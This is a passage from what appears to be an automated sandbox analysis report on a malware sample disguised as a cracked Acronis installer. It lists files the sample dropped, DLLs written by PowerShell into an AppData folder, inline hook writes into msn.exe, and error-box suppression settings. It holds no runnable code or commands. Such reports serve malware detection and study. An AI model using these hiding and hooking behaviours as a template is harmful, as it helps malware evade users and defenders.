                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DiskMediaTypeLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-HNNQ8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BAEH3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-I791C.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IECK1.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DF4GF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\System.Net.Http.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MJJQ3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-7QIOU.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\FSharp.Core.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUManufacturerCmdLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140d.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-1MK9F.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-PSF4N.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MOT2M.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VideoMemoryLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-Q1AT3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\qtgraphicaleffectsprivate.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-RLSFG.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\clrjit.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QCTRS.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Script.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-G5QCH.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DK0J4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MQD1U.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-E63PO.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\cpuidsdk64.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CN.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeFile created: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\tipskins.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Gui.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-KG79P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FanProfile.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-ECL6Q.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-URGPI.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\7za.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140_1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-PDJ8O.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msidcrl40.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DDTGT.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Widgets.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-45OJH.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-UDQ9J.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Build.Tasks.CodeAnalysis.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\qsqlite.dll (copy)Jump to dropped file

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; Memory written: PID: 3920 base: CB0005 value: E9 8B 2F A3 76
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; Memory written: PID: 3920 base: 776E2F90 value: E9 7A D0 5C 89
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
